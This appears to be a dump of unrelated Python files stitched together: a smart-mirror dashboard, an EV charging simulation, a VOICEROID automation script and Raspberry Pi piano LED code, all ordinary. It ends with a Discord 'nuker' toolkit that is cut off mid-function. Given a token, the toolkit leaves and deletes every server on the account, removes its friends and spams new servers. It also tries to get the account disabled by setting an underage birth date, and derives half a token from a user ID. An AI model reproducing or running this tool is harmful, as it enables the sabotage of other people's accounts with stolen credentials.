'09n': "assets/09n.png",
'10d': "assets/10d.png",
'10n': "assets/10n.png",
'11d': "assets/11d.png",
'11n': "assets/11n.png",
'13d': "assets/13d.png",
'13n': "assets/13n.png",
'50d': "assets/50d.png",
'50n': "assets/50n.png",
}
# Get Date/Time
class Clock(Frame):
def __init__(self, parent):
Frame.__init__(self, parent, bg=background_color)
# initialize time label
self.time1 = ''
self.timeLbl = Label(self, font=(text_font, large_text_size), fg=text_color, bg=background_color)
self.timeLbl.pack(side=TOP, anchor=W)
# initialize day of week
self.day_of_week1 = ''
self.dayOWLbl = Label(self, text=self.day_of_week1, font=(text_font, small_text_size), fg=text_color,
bg=background_color)
self.dayOWLbl.pack(side=TOP, anchor=W)
# initialize date label
self.date1 = ''
self.dateLbl = Label(self, text=self.date1, font=(text_font, small_text_size), fg=text_color,
bg=background_color)
self.dateLbl.pack(side=TOP, anchor=W)
self.tick()
def tick(self):
if time_format == 12:
time2 = time.strftime('%I:%M %p') # hour in 12h format
else:
time2 = time.strftime('%H:%M') # hour in 24h format
day_of_week2 = time.strftime('%A')
date2 = time.strftime(date_format)
# if time string has changed, update it
if time2 != self.time1:
self.time1 = time2
self.timeLbl.config(text=time2)
if day_of_week2 != self.day_of_week1:
self.day_of_week1 = day_of_week2
self.dayOWLbl.config(text=day_of_week2)
if date2 != self.date1:
self.date1 = date2
self.dateLbl.config(text=date2)
self.timeLbl.after(200, self.tick)  # Calls itself every 200 milliseconds
class News(Frame):
def __init__(self, parent, *args, **kwargs):
Frame.__init__(self, parent, *args, **kwargs)
self.config(bg=background_color)
self.title = 'Hot news in ' + news_country_code
self.newsLbl = Label(self, text=self.title, font=(text_font, medium_text_size), fg=text_color,
bg=background_color)
self.newsLbl.pack(side=TOP, anchor=W)
self.headlinesContainer = Frame(self, bg=background_color)
self.headlinesContainer.pack(side=TOP)
self.get_headlines()
def get_headlines(self):
try:
for widget in self.headlinesContainer.winfo_children(): #It removes the previous news widgets
widget.destroy()
if news_country_code is None:
headlines_url = "https://news.google.com/news?ned=us&output=rss"
else:
headlines_url = "https://news.google.com/news?ned=%s&output=rss" % news_country_code
feed = feedparser.parse(headlines_url)
for post in feed.entries[0:5]:
headline = NewsHeadline(self.headlinesContainer, post.title)
headline.pack(side=TOP, anchor=W)
except:
print("Error: Cannot get news.")
self.after(600000, self.get_headlines)
class NewsHeadline(Frame):
def __init__(self, parent, event_name=""):
Frame.__init__(self, parent, bg=background_color)
image = Image.open("assets/Newspaper.png")
image = image.resize((25, 25), Image.ANTIALIAS)
image = image.convert('RGB')
photo = ImageTk.PhotoImage(image)
self.iconLbl = Label(self, bg=background_color, image=photo)
self.iconLbl.image = photo
self.iconLbl.pack(side=LEFT, anchor=N)
self.eventName = event_name
self.eventNameLbl = Label(self, text=self.eventName, font=(text_font, xsmall_text_size), fg=text_color,
bg=background_color)
self.eventNameLbl.pack(side=LEFT, anchor=N)
class FullscreenWindow:
def __init__(self):
self.tk = Tk()
self.tk.configure(background=background_color)
self.topFrame = Frame(self.tk, background=background_color)
self.bottomFrame = Frame(self.tk, background=background_color)
self.topFrame.pack(side=TOP, fill=BOTH, expand=YES)
self.bottomFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
self.state = True
self.tk.bind("<F11>", self.toggle_fullscreen)
self.tk.config(cursor='none')
# clock
self.clock = Clock(self.topFrame)
self.clock.pack(side=LEFT, anchor=N, padx=0, pady=0)
# weather
self.weather = Weather(self.topFrame)
self.weather.pack(side=RIGHT, anchor=N, padx=0, pady=0)
# news
self.news = News(self.bottomFrame)
self.news.pack(side=LEFT, anchor=S, padx=0, pady=0)
def toggle_fullscreen(self, event=None):
self.state = not self.state # Just toggling the boolean
self.tk.attributes("-fullscreen", self.state)
return "break"
class Weather(Frame):
def __init__(self, parent, *args, **kwargs):
Frame.__init__(self, parent, bg=background_color)
self.temperature = ''
self.currently = ''
self.icon = ''
self.degreeFrm = Frame(self, bg=background_color)
self.degreeFrm.pack(side=TOP, anchor=W)
self.temperatureLbl = Label(self.degreeFrm, font=(text_font, xlarge_text_size), fg=text_color,
bg=background_color)
self.temperatureLbl.pack(side=LEFT, anchor=E)
self.iconLbl = Label(self, bg=background_color)
self.iconLbl.pack(side=RIGHT, anchor=E, padx=20)
self.currentlyLbl = Label(self, font=(text_font, medium_text_size), fg=text_color, bg=background_color)
self.currentlyLbl.pack(side=RIGHT, anchor=E)
self.get_weather()
def get_weather(self):
try:
resp = requests.get(
'http://api.openweathermap.org/data/2.5/weather?id=' + weather_city_id
+ '&units='
+ weather_unit
+ '&appid='
+ weather_api_token)
temp = resp.json()
pprint.PrettyPrinter(indent=4).pprint(temp)
self.degree_sign = u"\N{DEGREE SIGN}"
temperature = str(temp['main']['temp']) + self.degree_sign
current = temp['weather'][0]['main']
icon = temp['weather'][0]['icon']
icon2 = icon_lookup[icon]
print(icon2)
image = Image.open(icon2)
image = image.resize((100, 100), Image.ANTIALIAS)
photo = ImageTk.PhotoImage(image)
self.iconLbl.config(image=photo)
self.iconLbl.image = photo
self.temperatureLbl.config(text=temperature)
self.currentlyLbl.config(text=current)
except:
print ("No internet, cannot get weather.")
self.after(600000, self.get_weather)
def motion():
os.system('python motion.py')
def humid():
os.system('python humid.py')
if __name__ == '__main__':
mirror = FullscreenWindow()
mirror.tk.title("SmartMirror")
mirror.tk.attributes("-fullscreen", True)
Thread(target = motion).start() #starts the motion sensor in another thread
Thread(target = humid).start() #starts the humidity sensor in another thread
mirror.tk.mainloop()
|
uncontrolled.py
|
from multiprocessing import Process, Queue
import chargingmodel.preprocessing as preprocessing
import chargingmodel.optimize as optimize
import chargingmodel.tools as tools
# Uncontrolled charging.
# Every agent charges immediately and as much as possible after arriving at a charging station.
# Runs all regions in parallel; see the invocation sketch below.
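# A hypothetical invocation sketch (the argument values are illustrative, not defaults):
#
#   run(scenario=scenario, config=config, dbName="results.db",
#       regionIDs=[1001, 1002], aggFactors=[10, 10], n_worker=2, verbose=True)
#
# Regions are preprocessed one by one, solved in their own processes in batches of
# n_worker, and each batch's results are written to the database before the next starts.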
def run(*, scenario, config, dbName, regionIDs, aggFactors, n_worker, verbose):
queue = Queue()
currentWork = []
for i, regionID in enumerate(regionIDs):
# Preprocess data
agents = preprocessing.getAgents(scenario, config, regionID, aggFac=aggFactors[i])
# Create process
kwargs = {"agents": agents, "config": config,
"queue": queue}
p = Process(target=runCounty, name=str(regionID),
kwargs=kwargs)
currentWork.append(p)
# Run the queued processes; this waits for all of them to complete
if len(currentWork) >= n_worker:
results = tools.runProcesses(currentWork, verbose, queue)
currentWork = []
for result in results:
tools.saveDB(agents=result[0], demands=result[1], slacks=result[2], dbName=dbName)
# Run remaining processes
if currentWork:
results = tools.runProcesses(currentWork, verbose, queue)
for result in results:
tools.saveDB(agents=result[0], demands=result[1], slacks=result[2], dbName=dbName)
def runCounty(*, agents, config, queue):
demands, slacks = optimize.immediate(agents=agents,
eta=config["chargingEfficiency"],
SOCStart=config["SOCStart"],
deltaT=0.25)
queue.put((agents, demands, slacks))
|
kiritan.py
|
# coding: UTF-8
import os
import sys
import time
import hashlib
import logging
import threading
import subprocess
from win32con import *
from win32gui import *
from win32process import *
# Common settings
waitSec = 0.1
windowName = "VOICEROID+ 東北きりたん EX"
# WAV generation (serialized with a lock)
lock = threading.Lock()
def talk(input):
with lock:
return generate_wav(input)
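# Example (hypothetical): talk("こんにちは") blocks until VOICEROID has rendered the
# phrase and returns the absolute path of the generated WAV (or None for empty input).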
# Enumerate child windows
def enum_child_windows(window):
result = []
def callback(hwnd, param):
result.append((hwnd, GetClassName(hwnd), GetWindowText(hwnd)))
EnumChildWindows(window, callback, None)
return result
# Drive VOICEROID to generate a WAV file
def generate_wav(inputText):
# Reject empty input
inputText = inputText.strip()
if inputText == "":
return None
# Create the output directory
outdir = "./output/"
try:
os.mkdir(outdir)
except:
pass
# If the file already exists, reuse it
outfile = os.path.abspath(outdir + hashlib.md5(inputText.encode("utf-8")).hexdigest() + ".wav")
if os.path.exists(outfile):
return outfile
logging.info("Generating WAV")
while True:
# Look for the VOICEROID window
window = FindWindow(None, windowName) or FindWindow(None, windowName + "*")
if window:
break
# If not found, launch VOICEROID
subprocess.Popen([r"C:\Program Files (x86)\AHS\VOICEROID+\KiritanEX\VOICEROID.exe"])
time.sleep(32 * waitSec)
while True:
# Close any dialog that is showing
errorDialog = FindWindow(None, "エラー") or FindWindow(None, "注意") or FindWindow(None, "音声ファイルの保存")
if errorDialog:
SendMessage(errorDialog, WM_CLOSE, 0, 0)
time.sleep(waitSec)
else:
break
# Bring the window to the foreground
SetWindowPos(window, HWND_TOPMOST, 0, 0, 0, 0, SWP_SHOWWINDOW | SWP_NOMOVE | SWP_NOSIZE)
# Drive VOICEROID (up to opening the save dialog)
def __req_speech():
for hwnd, className, windowText in enum_child_windows(window):
# Enter the text
if className.count("RichEdit20W"):
SendMessage(hwnd, WM_SETTEXT, 0, inputText)
if windowText.count("音声保存"):
# Restore the window if minimized
ShowWindow(window, SW_SHOWNORMAL)
# Click the save button
SendMessage(hwnd, WM_LBUTTONDOWN, MK_LBUTTON, 0)
SendMessage(hwnd, WM_LBUTTONUP, 0, 0)
# Run in a separate thread (SendMessage blocks once the save dialog opens)
threading.Thread(target=__req_speech).start()
# Wait for the save dialog to appear
while True:
dialog = FindWindow(None, "音声ファイルの保存")
if dialog:
break
time.sleep(waitSec)
# Fill in the file name and press the save button
while FindWindow(None, "音声ファイルの保存"):
for hwnd, className, windowText in enum_child_windows(dialog):
# Enter the file name
if className.count("Edit"):
SendMessage(hwnd, WM_SETTEXT, 0, outfile)
# Press the save button
if windowText.count("保存"):
SendMessage(hwnd, WM_LBUTTONDOWN, MK_LBUTTON, 0)
SendMessage(hwnd, WM_LBUTTONUP, 0, 0)
time.sleep(waitSec)
# Wait while the progress dialog is visible
while FindWindow(None, "音声保存"):
time.sleep(waitSec)
# Delete the companion .txt file if it exists
try:
os.remove(outfile.replace("wav", "txt"))
except:
pass
return outfile
|
functions.py
|
import math
import threading
from neopixel import *
import mido
import datetime
import psutil
import time
import socket
import RPi.GPIO as GPIO
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
return local_ip
def find_between(s, start, end):
try:
return (s.split(start))[1].split(end)[0]
except:
return False
def clamp(val, val_min, val_max):
return max(val_min, min(val, val_max))
def shift(l, n):
return l[n:] + l[:n]
def play_midi(song_path, midiports, saving, menu, ledsettings, ledstrip):
#commented parts are for benchmarking
midiports.pending_queue.append(mido.Message('note_on'))
if song_path in saving.is_playing_midi.keys():
menu.render_message(song_path, "Already playing", 2000)
return
saving.is_playing_midi.clear()
saving.is_playing_midi[song_path] = True
menu.render_message("Playing: ", song_path, 2000)
saving.t = threading.currentThread()
try:
mid = mido.MidiFile("Songs/" + song_path)
fastColorWipe(ledstrip.strip, True, ledsettings)
#length = mid.length
t0 = False
total_delay = 0
# notes_count = 0
delay = 0
# message_to_print = ''
for message in mid:
if song_path in saving.is_playing_midi.keys():
if not t0:
t0 = time.time()
# if(notes_count >= 100):
# notes_count = 0
# print(repr(message_to_print))
# message_to_print = ''
# notes_count += 1
total_delay += message.time
current_time = (time.time() - t0) + message.time
drift = total_delay - current_time
if (drift < 0):
delay = message.time + drift
else:
delay = message.time
if(delay < 0):
delay = 0
#message_to_print += "\n Message: "+str(message)+" Total delay: "+str(total_delay)+" current_time: "+str(current_time)+' message time: ' + str(message.time) + ' actual delay: ' + str(
#delay) + ' drift: ' + str(drift)
if delay > 0:
time.sleep(delay)
if not message.is_meta:
midiports.playport.send(message)
midiports.pending_queue.append(message.copy(time=0))
else:
break
print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, total_delay))
#print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, length))
# saving.is_playing_midi = False
except:
menu.render_message(song_path, "Can't play this file", 2000)
saving.is_playing_midi.clear()
for i in range(ledstrip.strip.numPixels()):
ledstrip.strip.setPixelColor(i, Color(0, 0, 0))
def screensaver(menu, midiports, saving, ledstrip):
KEY2 = 20
GPIO.setup(KEY2, GPIO.IN, GPIO.PUD_UP)
delay = 0.1
interval = 3 / float(delay)
i = 0
cpu_history = [None] * int(interval)
cpu_chart = [0] * 28
cpu_average = 0
upload = 0
download = 0
upload_start = 0
download_start = 0
local_ip = 0
if menu.screensaver_settings["local_ip"] == "1":
local_ip = get_ip_address()
try:
midiports.inport.poll()
except:
pass
while True:
if (time.time() - saving.start_time) > 3600 and delay < 0.5 and menu.screensaver_is_running == False:
delay = 0.9
interval = 5 / float(delay)
cpu_history = [None] * int(interval)
cpu_average = 0
i = 0
if int(menu.screen_off_delay) > 0 and ((time.time() - saving.start_time) > (int(menu.screen_off_delay) * 60)):
menu.screen_status = 0
GPIO.output(24, 0)
if int(menu.led_animation_delay) > 0 and ((time.time() - saving.start_time) > (
int(menu.led_animation_delay) * 60)) and menu.screensaver_is_running == False:
menu.screensaver_is_running = True
if menu.led_animation == "Theater Chase":
menu.t = threading.Thread(target=theaterChase, args=(ledstrip.strip, 1))
menu.t.start()
if menu.led_animation == "Breathing Slow":
menu.t = threading.Thread(target=breathing, args=(ledstrip.strip, 25))
menu.t.start()
if menu.led_animation == "Rainbow Slow":
menu.t = threading.Thread(target=rainbow, args=(ledstrip.strip, 10))
menu.t.start()
if menu.led_animation == "Rainbow Cycle Slow":
menu.t = threading.Thread(target=rainbowCycle, args=(ledstrip.strip, 10))
menu.t.start()
if menu.led_animation == "Theater Chase Rainbow":
menu.t = threading.Thread(target=theaterChaseRainbow, args=(ledstrip.strip, 5))
menu.t.start()
if menu.led_animation == "Sound of da police":
menu.t = threading.Thread(target=sound_of_da_police, args=(ledstrip.strip, 1))
menu.t.start()
if menu.led_animation == "Scanner":
menu.t = threading.Thread(target=scanner, args=(ledstrip.strip, 1))
menu.t.start()
hour = datetime.datetime.now().strftime("%H:%M:%S")
date = datetime.datetime.now().strftime("%d-%m-%Y")
cpu_usage = psutil.cpu_percent()
cpu_history[i] = cpu_usage
cpu_chart.append(cpu_chart.pop(0))
cpu_chart[27] = cpu_usage
if i >= (int(interval) - 1):
i = 0
try:
cpu_average = sum(cpu_history) / (float(len(cpu_history) + 1))
last_cpu_average = cpu_average
except:
cpu_average = last_cpu_average
if menu.screensaver_settings["ram"] == "1":
ram_usage = psutil.virtual_memory()[2]
else:
ram_usage = 0
if menu.screensaver_settings["temp"] == "1":
try:
temp = find_between(str(psutil.sensors_temperatures()["cpu_thermal"]), "current=", ",")
except:
temp = find_between(str(psutil.sensors_temperatures()["cpu-thermal"]), "current=", ",")
temp = round(float(temp), 1)
else:
temp = 0
if menu.screensaver_settings["network_usage"] == "1":
upload_end = psutil.net_io_counters().bytes_sent
download_end = psutil.net_io_counters().bytes_recv
if upload_start:
upload = upload_end - upload_start
upload = upload * (1 / delay)
upload = upload / 1000000
upload = round(upload, 2)
if download_start:
download = download_end - download_start
download = download * (1 / delay)
download = download / 1000000
download = round(download, 2)
upload_start = upload_end
download_start = download_end
else:
upload = 0
download = 0
if menu.screensaver_settings["sd_card_space"] == "1":
card_space = psutil.disk_usage('/')
else:
card_space = 0
menu.render_screensaver(hour, date, cpu_usage, round(cpu_average, 1), ram_usage, temp, cpu_chart, upload,
download, card_space, local_ip)
time.sleep(delay)
i += 1
try:
if str(midiports.inport.poll()) != "None":
menu.screensaver_is_running = False
saving.start_time = time.time()
menu.screen_status = 1
GPIO.output(24, 1)
menu.show()
midiports.reconnect_ports()
midiports.last_activity = time.time()
break
except:
pass
if GPIO.input(KEY2) == 0:
menu.screensaver_is_running = False
saving.start_time = time.time()
menu.screen_status = 1
GPIO.output(24, 1)
menu.show()
midiports.reconnect_ports()
break
# Get note position on the strip
def get_note_position(note, ledstrip):
note_offset = 0
if note > 27:
note_offset = math.ceil((note - 27)/14)
note_offset -= ledstrip.shift
note_pos_raw = 2 * (note - 20) - note_offset
if ledstrip.reverse:
return max(0, ledstrip.led_number - note_pos_raw)
else:
return max(0, note_pos_raw)
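# Worked example (assuming ledstrip.shift == 0 and ledstrip.reverse == False):
# note 60 (middle C) gives note_offset = ceil((60 - 27) / 14) = 3 and
# note_pos_raw = 2 * (60 - 20) - 3 = 77, so LED 77 is lit.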
# scale: 1 means in C, scale: 2 means in C#, scale: 3 means in D, etc...
def get_scale_color(scale, note_position, ledsettings):
notes_in_scale = [0, 2, 4, 5, 7, 9, 11]
scale = int(scale)
note_position = (note_position - scale) % 12
if note_position in notes_in_scale:
return list(ledsettings.key_in_scale.values())
else:
return list(ledsettings.key_not_in_scale.values())
def get_rainbow_colors(pos, color):
pos = int(pos)
if pos < 85:
if color == "green":
return pos * 3
elif color == "red":
return 255 - pos * 3
elif color == "blue":
return 0
elif pos < 170:
pos -= 85
if color == "green":
return 255 - pos * 3
elif color == "red":
return 0
elif color == "blue":
return pos * 3
else:
pos -= 170
if color == "green":
return 0
elif color == "red":
return pos * 3
elif color == "blue":
return 255 - pos * 3
# LED animations
def fastColorWipe(strip, update, ledsettings):
brightness = ledsettings.backlight_brightness_percent / 100
red = int(ledsettings.get_backlight_color("Red") * brightness)
green = int(ledsettings.get_backlight_color("Green") * brightness)
blue = int(ledsettings.get_backlight_color("Blue") * brightness)
color = Color(green, red, blue)
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
if update:
strip.show()
def theaterChase(strip, color, ledsettings, menu, wait_ms=25):
"""Movie theater light style chaser animation."""
menu.screensaver_is_running = False
time.sleep(0.5)
if menu.screensaver_is_running:
return
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
red = int(ledsettings.get_color("Red"))
green = int(ledsettings.get_color("Green"))
blue = int(ledsettings.get_color("Blue"))
for q in range(5):
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, Color(green, red, blue))
strip.show()
time.sleep(wait_ms / 1000.0)
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, 0)
j += 1
if j > 256:
j = 0
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def wheel(pos):
"""Generate rainbow colors across 0-255 positions."""
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
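# For example, wheel(0) -> Color(0, 255, 0), wheel(85) -> Color(255, 0, 0) and
# wheel(170) -> Color(0, 0, 255); intermediate positions blend between these.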
def rainbow(strip, ledsettings, menu, wait_ms=20):
"""Draw rainbow that fades across all pixels at once."""
menu.screensaver_is_running = False
time.sleep(0.2)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel(j & 255))
j += 1
if j >= 256:
j = 0
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def rainbowCycle(strip, ledsettings, menu, wait_ms=20):
"""Draw rainbow that uniformly distributes itself across all pixels."""
menu.screensaver_is_running = False
time.sleep(0.2)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))
j += 1
if j >= 256:
j = 0
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def theaterChaseRainbow(strip, ledsettings, menu, wait_ms=25):
"""Rainbow movie theater light style chaser animation."""
menu.screensaver_is_running = False
time.sleep(0.5)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for q in range(5):
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, wheel((i + j) % 255))
strip.show()
time.sleep(wait_ms / 1000.0)
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, 0)
j += 1
if j > 256:
j = 0
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def breathing(strip, ledsettings, menu, wait_ms=2):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
multiplier = 24
direction = 2
while menu.screensaver_is_running:
if multiplier >= 98 or multiplier < 24:
direction *= -1
multiplier += direction
divide = multiplier / float(100)
red = int(round(float(ledsettings.get_color("Red")) * float(divide)))
green = int(round(float(ledsettings.get_color("Green")) * float(divide)))
blue = int(round(float(ledsettings.get_color("Blue")) * float(divide)))
for i in range(strip.numPixels()):
strip.setPixelColor(i, Color(green, red, blue))
strip.show()
if wait_ms > 0:
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def sound_of_da_police(strip, ledsettings, menu, wait_ms=5):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
middle = strip.numPixels() / 2
r_start = 0
l_start = 196
while menu.screensaver_is_running:
r_start += 14
l_start -= 14
for i in range(strip.numPixels()):
if (i > middle) and i > r_start and i < (r_start + 40):
strip.setPixelColor(i, Color(0, 255, 0))
elif (i < middle) and i < l_start and i > (l_start - 40):
strip.setPixelColor(i, Color(0, 0, 255))
else:
strip.setPixelColor(i, Color(0, 0, 0))
if r_start > 150:
r_start = 0
l_start = 175
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def scanner(strip, ledsettings, menu, wait_ms=1):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
position = 0
direction = 3
scanner_length = 20
red_fixed = ledsettings.get_color("Red")
green_fixed = ledsettings.get_color("Green")
blue_fixed = ledsettings.get_color("Blue")
while menu.screensaver_is_running:
position += direction
for i in range(strip.numPixels()):
if i > (position - scanner_length) and i < (position + scanner_length):
distance_from_position = position - i
if distance_from_position < 0:
distance_from_position *= -1
divide = ((scanner_length / 2) - distance_from_position) / float(scanner_length / 2)
red = int(float(red_fixed) * float(divide))
green = int(float(green_fixed) * float(divide))
blue = int(float(blue_fixed) * float(divide))
if divide > 0:
strip.setPixelColor(i, Color(green, red, blue))
else:
strip.setPixelColor(i, Color(0, 0, 0))
if position >= strip.numPixels() or position <= 1:
direction *= -1
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
|
NyxunToolKit-Nuker.py
|
import base64
import ctypes
import itertools
import json
import keyboard
import os
import random
import re
import requests
import string
import sys
import threading
import time
import urllib
import aiohttp
import colorama
import discord
import platform as plt
import psutil
from base64 import b64decode
from colorama import Fore, init, Style
from datetime import datetime
from discord.ext import commands
from discord.ext.commands import Bot
from itertools import cycle
from json import loads, dumps
from random import randint
from re import findall
from subprocess import Popen, PIPE
from sys import argv
from threading import Thread
from time import gmtime, sleep, strftime
from urllib.request import Request, urlopen
#snipper
def Spinner():
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Loading')
os.system('cls')
l = ['|', '/', '-', '\\']
for i in l+l+l+l+l+l+l+l+l+l+l+l+l:
sys.stdout.write('\r' + f'{Fore.CYAN}{Style.BRIGHT}[*] Loading... '+i)
sys.stdout.flush()
time.sleep(0.2)
Spinner()
#start of methods
def nuketoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Nuke Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Guild Amount: '))
name = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Guild Name: ')
print('')
print('')
print(f'{Fore.GREEN}Token is valid.{Fore.RESET}')
try:
bot = commands.Bot(command_prefix='-', self_bot=True)
bot.remove_command("help")
@bot.event
async def on_ready(times : int=100):
print("Leaving Guilds")
for guild in bot.guilds:
try:
await guild.leave()
print(f'Left: [{guild.name}]')
except:
print(f'Failed: [{guild.name}]')
print("")
print("Deleting Guilds")
for guild in bot.guilds:
try:
await guild.delete()
print(f'Deleted Guild: [{guild.name}]')
except:
print(f'Failed: [{guild.name}]')
print("")
print("Removing Relationships")
for user in bot.user.friends:
try:
await user.remove_friend()
print(f'Removed Relationship: {user}')
except:
print(f"Failed: {user}")
print("")
print("Creating Guilds")
for i in range(amount):
await bot.create_guild(f'{name}', region=None, icon=None)
print(f'Server Created: [{i}]')
print("")
print(f'{Fore.GREEN}Successfully nuked token{Fore.RESET}')
input(f'Press [Enter] key to go back to Main Menu.')
mainMenu()
bot.run(token, bot=False)
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def unverifytoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Unverify Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.post('https://discordapp.com/api/v8/users/@me/relationships', headers={'Authorization': token, 'User-Agent': 'discordbot'}, json={'username': 'LMAO', 'discriminator': 6572})
if r.status_code == 204:
print(f'{Fore.GREEN}Successfully unverified token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Failed to unverify token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def bantoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Ban Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.patch('https://discordapp.com/api/v8/users/@me', headers={'Authorization': token}, json={'date_of_birth': '2015-7-16'})
if r.status_code == 400:
print(f'{Fore.GREEN}Successfully banned token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Failed to ban token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
os.system('cls')
def tokenfromuserid():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Half Token From User ID')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
userid = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} ID: ')
string_b = f"{userid}".encode('utf')
bas64_bytes = base64.b64encode(string_b)
print(bas64_bytes.decode('utf-8'))
print(f'Press [Enter] key to go back to Main Menu.')
while True:
